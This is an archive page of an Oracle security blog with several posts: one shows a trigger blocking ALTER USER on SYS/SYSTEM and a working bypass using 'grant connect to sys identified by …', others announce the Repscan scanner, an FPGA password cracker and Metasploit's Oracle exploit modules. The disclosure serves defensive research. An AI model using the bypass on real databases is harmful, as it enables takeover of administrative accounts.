Archive for the ‘Oracle Security’ Category

« Older Entries
Newer Entries »

How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password and how to bypass it

Mittwoch, Februar 24th, 2010

I found the following nice article „How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password“ [271077.1] on My Oracle Support. As always if I see PL/SQL code I am looking for ways to find security problems or to bypass limitations.

SQL> conn  / as sysdba
Connected.

SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER‘ and ora_dict_obj_type = ‚USER‘ and
(ora_dict_obj_name = ‚SYSTEM‘ or ora_dict_obj_name = ‚SYS‘)
THEN
RAISE_APPLICATION_ERROR(-20003,
‚You are not allowed to alter SYSTEM/SYS user.‘);
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user dbsnmp identified by dbsnmp;
User altered.

Many Oracle users are not aware that the grant command can also be used to change passwords or even create users („grant dba to user1,user2 identified by user1,user2“). In our case we can use this technique to bypass the database trigger.
SQL> grant connect to sys identified by alex;
Grant succeeded.

SQL> grant connect to system identified by alex;
Grant succeeded.

To fix this problem we have to block grant commands as well….

Posted in Oracle Security, source code audit | 1 Comment »

New Repscan 3.0 is available

Dienstag, Februar 23rd, 2010

The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large amount of new features and a complete new GUI (First database scanner with Office-2007 UI).

Repscan 3.0

Here some of the new features of Repscan 3.0:

  • Support for MS SQL Server (2000, 2005, 2008)
  • Extremely user-friendly database configuration wizard (screenshot)
  • Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
  • Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
  • New reports (performance, used_features, …)
  • Data Discovery (SSN, PII, Creditcard, Passwords, …)
  • Database Enumeration (custom, NMap support) (screenshot)
  • Pentest Features (Guess SID, Check default username/password combinations, …)
  • Exploit & Code Library (screenshot)
  • Version and Patch Information
  • Skins

Here some (old) features of Repscan:

  • Password plugin architecture
  • Password plugins for Oracle DES, SHA1, OID, APEX, OVS
  • Commandline features
  • PL/SQL Source Code Analysis Report

Here some statements of Repscan 3.0 users:

„Repscan Rocks“, „I must have this tool.“, „Very cool stuff“, „really like the clean interface… checks are great“, „…tend to be more Oracle security information hub than just scanner :-)“

Over the next  few weeks I will show here more details of some Repscan 3.0 features.

If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo

Posted in Allgemein, Oracle Security, Security, software, source code audit, Tools | No Comments »

Interesting Article about SQL Injection in Oracle by Mike Smithers

Montag, Februar 15th, 2010

Mike Smithers, a former colleague, maintains a nice blog called „The Anti-Kyte„. He wrote a really interesting article „Self-Inflicted SQL Injection – don’t quote me !“ about SQL Injection in Oracle.

Well written Mike.

Posted in Allgemein, Oracle Security, SQL Injection | No Comments »

Dennis Yurichev wrote an article about his FPGA Oracle password cracker

Sonntag, Dezember 6th, 2009

Dennis Yurichev wrote an interesting background article about his FPGA password cracker for Oracle, currently the fastest (known) way to brute force Oracle DES passwords.

Dennis mentioned in the article that „By Oracle’s password standard, first password symbol is always Latin character (one of 26)“. This is not exactely correct if you enclose the password in double quotes. In this case all characters are allowed. I tested the FPGA cracker with the following test case and it seems not to crack the hash (currently still running).

SQL> grant dba to x identified by „1“;

Grant succeeded.

SQL> select username,password from dba_users where username=’X‘;

USERNAME                       PASSWORD
—————————— ——————————
X                              4D91C057D0C4D801

If you want to try his FPGA cracker here is the link.
Well done and very interesting article Dennis. The only thing I would be interestedis the price of the FPGA hardware.

Posted in Oracle Security, passwords, Tools | No Comments »

Metasploit 3.3 is out

Dienstag, November 17th, 2009

Metasploit 3.3, the leading exploit framework is out. Here an extract from the Metasploit blog:

Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws.

Version 3.3. (release notes) is the largest known ruby application (375,000 lines of code) and comes with some new Oracle features

  • Support for the Oracle InstantClient Ruby driver as an exploit mixin
  • Extensive support for exploitation and post-exploitation tasks against Oracle databases

Have fun using Metasploit.

Posted in Allgemein, Exploit, Oracle Security, Tools | No Comments »

« Older Entries
Newer Entries »